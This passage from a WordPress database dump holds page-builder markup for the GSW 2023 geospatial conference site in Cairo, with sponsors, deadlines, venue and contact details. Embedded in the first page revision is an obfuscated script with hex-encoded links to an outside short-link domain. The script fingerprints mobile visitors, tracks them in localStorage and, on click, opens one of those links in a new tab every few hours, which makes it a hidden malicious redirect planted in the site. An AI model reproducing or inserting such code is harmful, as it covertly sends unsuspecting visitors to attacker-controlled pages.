5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 01:59:20','2023-04-02 01:59:20','',3066,'https://gsw2023.com/?p=4001',0,'revision','',0),
(4002,1,'2023-04-02 02:32:54','2023-04-02 02:32:54','[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]\r\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400344244{margin-top: 95px !important;}\"]\r\n\r\n<img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400550419{margin-top: 125px !important;}\"]\r\n<h6></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"]\r\n\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong>\r\n\r\n<strong>15 April 2023</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" 